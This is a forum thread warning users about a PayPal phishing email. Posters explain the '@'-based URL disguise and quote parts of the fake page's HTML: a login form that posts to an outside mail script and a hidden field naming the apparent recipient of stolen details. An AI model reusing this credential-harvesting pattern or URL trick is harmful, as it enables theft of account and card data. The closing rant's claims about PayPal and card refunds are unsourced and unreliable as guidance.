Default PAYPAL Users - BEWARE (Scam Alert)

I'd Like to Thank TypeRP for the info as he posted it in the R forum and I wanted to share it with everyone here. https://honda-tech.com/zerothread?id=170615

Quoted from TypeRP
"Please take a moment to read this email if you do banking with PayPal.com
Yesterday I've received an email with a web-link requesting update on my Paypal account including credit card number, bank account information and such. After close examination of the web page I can only tell you that:
This guy is really good.

Anyway, I've attach a link of this fake paypal for your amusment. Paypal and F.B.I. got one too.

cheers!
here is the link to the fake site: http://paypal.security.id=2827416487...lert/index.htm
and here is the link to the real site: https://www.paypal.com/
"

You can tell it is a Scam and Fake 2 Ways.
1 - You can enter ANY username and password and it confirms it as being Valid
2 - The link has @12.101.58.150/infoalert/index.htm Which is what is directing you towards a site Which is NOT paypal. Add any Site to the front of that Link Or Just enter that link without the @ symbol and it takes you to the actual site, Hosted off of a free web space.
Also as I was told by Chris any Paypal Site link will start with [b]"https://"[b]

Hope this saved a few people. If you have entered this Site and entered info please contact the FBI and Paypal.

looks fine to me-- it redirects to paypal.com after that pge loads... checked the source code, no hidden input fileds... redirect to https://paypal.com

regardless, i still wouldn't use it.

I always go to x.com to login to paypal... that was their orrig .com and its way easier to see where you are with such a short url

Are you ******* stupid??

Here are some excerpts from the source code
---form ACTION="http://www.terrasite.com/cgi-bin/wincgimail.asp" METHOD="POST"---
(This is where the script that runs the login fake is located)
---input type="hidden" name="AzN Inc." value=" Mail"---
(This looks like the from name in an email value)
---input type="hidden" name="URL" value="http://paypal.verifybilling.id=98274164875872349857.87245 97554@12.101.58.150/infoalert/verify.html---
(This is the second bogus page you are taken too after your login information is caputered)
---input type="hidden" name="email" value="darkmankk@aol.com"---
(this is probably the email address that all stolen info is sent to.

Now what were you saying again? Is this your script kiddie wanna be leet page?

Fact: PayPal protects the seller only. If a seller cleans out his account (and he can if he wants to), the guy that had his money taken gets nothing but a nice email from the biggest scammers out there (PayPal), that tells you that you have won the arbitration, but the seller has nothing in his account and you are fucked (not those exact words, but they might just as well be). They also say that if he gets any money in his account, that it will go to you. That way you get the money from the other guy that got scammed. Now he's fucked. Like a chain letter or pyramid scam. Sounds like Amway! It doesn't matter if you use your credit card, because you were paying PayPal for a service that they rendered and, legally, there is nothing that your credit card company can do. Serious vendors take credit cards. Credit card companies require that they keep a percentage of their monthly take in their account. If they screw you, you get your money back. I know this to be true from experience. I have been on the screwing side of both Visa and COD. Visa gave me my money back. Us average Joes are best protected by an escrow service. The cost is similar to PayPal, but the risk is almost non-existent (nothing is perfect and if the item you bought turns to **** after you have signed off, you may still be fucked). COD is of little help because FedEx and UPS will not let you inspect the goods until you pay. Since they encourage and almost insist that the seller accept only certified funds, if you got a big box of rocks...you guessed it...fucked again. A show of hands by those of us who have been fucked. It ain't fun! We need to do all that we can to make sure that these *** **** ******* get busted (What??? An *** is a donkey). Don't back off. Stay tenacious, even if it costs you money. If more of us stick by their prinicples and go after these *******, they will go away. This guy below did not know who he was ******* with. He will pay someday.
